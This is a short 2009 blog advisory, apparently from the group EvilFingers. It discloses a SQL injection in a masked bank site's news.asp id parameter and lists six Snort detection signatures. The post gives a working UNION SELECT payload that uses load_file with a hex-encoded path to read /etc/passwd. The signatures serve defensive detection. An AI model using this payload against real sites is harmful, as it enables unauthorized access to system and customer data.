Sunday, January 4, 2009

SQLInjection for Bank

Credit for Exploit: Rohit Bansal

Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file
(0x2f6574632f706173737764),5,6,7--

Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT

Countermeasure:

Use the above combination to ensure that your snort signature prevents the attack.

Example(s) on EmergingThreats Format:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)

Disclosure: EvilFingers neither guarantee's the exploit nor the signature.

Contact us at Contact.Fingers @ gmail.com for any further questions.

- EF

No comments: